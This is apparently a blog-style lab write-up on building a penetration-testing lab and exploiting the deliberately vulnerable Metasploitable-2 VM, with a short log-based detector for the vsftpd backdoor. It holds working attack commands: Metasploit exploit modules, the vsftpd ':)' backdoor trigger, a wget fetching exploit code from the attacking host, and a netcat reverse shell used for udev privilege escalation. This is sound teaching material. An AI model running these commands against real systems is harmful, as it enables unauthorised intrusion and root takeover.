Basic Penetration testing lab — 1

Sahil Ahamad
Sep 16, 2018 · 8 min read

I am setting up a new lab for myself and thought I would document the process, so anyone who wants to do the same can use this post as a reference. I am writing this one from scratch and will add more parts as I move forward.

Preface

  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

VMware Fusion 10 — I like the paid version of VMware Fusion 10, but you can also use VirtualBox, which is FREE; still, I highly recommend VMware Fusion 10.

Parrot OS — I have been using Kali Linux for a long time; I wanted to try Parrot OS because it was recommended by many.

Metasploitable-2 — Metasploitable-2 is intentionally vulnerable; it is developed by Rapid7 for practicing against a vulnerable host. DO NOT expose this machine to any production or sensitive network.

https://metasploit.help.rapid7.com/docs/metasploitable-2

2. Creating Virtual Machines.

Parrot OS

Click on “Install from disc or image”, locate your ISO and accept the default configuration; you can choose the memory and disk size according to your needs.


Provide the location of the Parrot OS ISO.


You can use “live mode” or install. I preferred the installed version.


Metasploitable-2

The installation process is similar to that of Parrot OS.


You can provide the memory and disk size according to your needs, but keep the resources of the host machine in mind when choosing custom values.


3. Configuring Virtual Machines

For a penetration testing lab it is important that the machines can reach each other over the local network. To do that, select the “Bridged” connection in the network settings of both virtual machines. Keep in mind that a bridged adapter places the VMs on the same physical network as your host, so every device on that LAN can reach the vulnerable Metasploitable-2 machine; a host-only or custom private network keeps the lab isolated while the two VMs can still see each other.

ParrotOS

Choose the adapter settings according to your requirements.

Metasploitable-2


4. Reconnaissance

Start up both machines, ParrotOS and Metasploitable-2.

Metasploitable-2

Log in with the following credentials.

Username: msfadmin
Password: msfadmin

Find the local IP address of Metasploitable-2 using

ifconfig

Metasploitable-2 local IP: 192.168.10.10

ParrotOS

Log in with your credentials.

Default credentials for ParrotOS:

Username: user
Password: toor

Find the IP address for ParrotOS using the following command.

ifconfig
ParrotOS local IP: 192.168.10.5

Port scanning Metasploitable-2 using ParrotOS

nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metasploit2-nmap-scan.xml

The output is in XML format; let's convert it into a more organized form.

For this we will use a utility called “xsltproc”, which converts the XML into HTML.

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.html

5. Exploiting Common Vulnerabilities.

Metasploitable-2

1. Exploiting vsftpd 2.3.4

2. Exploiting distcc v1 — CVE-2004-2687

1. Exploiting vsftpd 2.3.4.

Aim: Exploit the vsftpd daemon and obtain root access.

Scanning port 21 using nmap.

nmap -sV -p 21 192.168.10.10

Port 21 is open and running vsftpd version 2.3.4.

Searching online for a publicly available exploit for this particular version:

vsftp 2.3.4 exploits

Exploiting manually.

ftp 192.168.10.10
Username: ehsahil:)
Password: nothing, just press Enter

PS: the smiley :) at the end of the username is important; it is what triggers the backdoor.


Now we connect to port 6200, which the backdoor has opened.

nc -vvn 192.168.10.10 6200

Exploiting using Metasploit.

Start Metasploit with the msfconsole command.

msfconsole

Metasploit commands.

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.10.10
exploit

Background: This specific version of vsftpd was infected with a backdoor by an intruder. The developers quickly responded by removing the backdoor from the code, but users who had upgraded to this version in the meantime were vulnerable to the issue.

The backdoor is triggered when someone includes :) (a smiley face) in the username during the FTP handshake; the backdoor then sets up a bind shell listener on port 6200.
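From the defender's side, as an added example that is not part of the original post, the trigger described above (a ":)" in the FTP USER name followed by a connection to port 6200) can be detected from server-side logs. The log lines and their one-line format are constructed for this example; real FTP or firewall logs would need their own parser.

```python
import re
from datetime import datetime, timedelta

# Constructed log lines (not real captures). Assumed format per line:
# "<ISO timestamp> <client-ip> <event>", where event is the FTP command
# seen on port 21 ("USER ...", "PASS ...") or a connection-tracking entry
# "CONNECT tcp/<port>" for a new connection to the server.
SAMPLE_LOG = """\
2018-09-16T10:00:01 192.168.10.5 USER msfadmin
2018-09-16T10:00:02 192.168.10.5 PASS ****
2018-09-16T10:02:10 192.168.10.5 USER ehsahil:)
2018-09-16T10:02:11 192.168.10.5 PASS ****
2018-09-16T10:02:15 192.168.10.5 CONNECT tcp/6200
2018-09-16T10:05:00 192.168.10.77 USER alice
2018-09-16T10:05:30 192.168.10.77 CONNECT tcp/6200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (.*)$")
BACKDOOR_PORT = 6200  # bind shell port opened by the vsftpd 2.3.4 backdoor

def parse_log(text):
    """Yield (timestamp, client_ip, event) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)

def find_backdoor_triggers(text, window=timedelta(seconds=60)):
    """Flag USER commands containing ':)' and record whether the same client
    connected to port 6200 within `window` afterwards (likely a live shell)."""
    events = list(parse_log(text))
    alerts = []
    for ts, ip, ev in events:
        if not ev.startswith("USER ") or ":)" not in ev:
            continue
        followed = any(ip2 == ip and ev2 == f"CONNECT tcp/{BACKDOOR_PORT}"
                       and ts <= ts2 <= ts + window for ts2, ip2, ev2 in events)
        alerts.append({"time": ts.isoformat(), "client": ip,
                       "user": ev[5:], "shell_connect_seen": followed})
    return alerts

def backdoor_port_connections(text):
    """Every client that connected to port 6200 at all; worth alerting on even
    when the USER trigger was not observed (e.g. the FTP log was incomplete)."""
    return sorted({ip for _, ip, ev in parse_log(text)
                   if ev == f"CONNECT tcp/{BACKDOOR_PORT}"})
```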

Vulnerable Source code: http://pastebin.com/AetT9sS5

Detailed Source code review:

2. Exploiting Vulnerable distcc — CVE-2004-2687

Aim: Getting root access on the machine.

distcc v1 is a known vulnerable application running on Metasploitable-2. It is interesting because we have to escalate from a normal user to root using “Privilege Escalation”.

Searching online about distcc:

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distcc is running on port 3632.

Running nmap against port 3632

nmap -sV -p 3632 192.168.10.10

Searching for a public exploit for distccd v1.

Vulnerable to: CVE-2004-2687

Exploit publicly available: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

Exploiting using Metasploit

msfconsole

Metasploit commands.

search distcc
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.10.10
exploit

Currently uid=1 (daemon) and we cannot cat /etc/shadow; this indicates that we don't have root privileges yet.

We need to leverage another vulnerability in the installed components.

To find one, we apply the recon process to learn more about the system.

Listing all the shells available to us.

cat /etc/shells

GCC — Used for compiling exploits

which gcc

WGET — Used to download the exploit in the vulnerable machine

which wget

Let's see all the running processes.

ps aux

From the above processes we could go on to look for publicly available exploits.

But as we are using Metasploitable-2, we already know the vulnerable component, so we will use that.

The vulnerable component is “udev”; let's grep for it in the running processes.

Searching for exploits on searchsploit

searchsploit udev

We are interested in the exploit “Local Privilege Escalation (2) — /exploits/linux/local/8572.c”.

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.


Steps for escalating from daemon to root.

1. Starting the local Apache server (apache2) on ParrotOS

service apache2 start

2. Copying the exploit into the Apache server's public directory

Exploit directory: /usr/share/exploitdb/exploits/linux/local/

Apache server's public directory: /var/www/html

sudo cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c

3. Downloading the exploit file onto the vulnerable machine using wget.

ParrotOS IP: 192.168.10.5

wget 192.168.10.5/ehsahil.c

Our exploit code “ehsahil.c” has now been copied to the /tmp directory.

4. Creating a run file in the /tmp directory (required by the exploit)

touch run   # create the run file required by the exploit
# shell script that gives us the reverse shell
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil

6. Listening on port 5555 (on ParrotOS).

nc -lvnp 5555

7. Finding the PID of the udev Netlink socket

cat /proc/net/netlink

PID of the udev Netlink socket = 2718

8. Giving execute permission to the compiled exploit.

chmod 755 ehsahil

9. Running the exploit.

./ehsahil <udev-netlink-PID>

./ehsahil 2718

Reverse shell obtained.


I will post more metasploitable2 common exploits as I practice them.

Credits

RWB NetSec

Feedback? hit me on twitter @ehsahil

Until Next time.
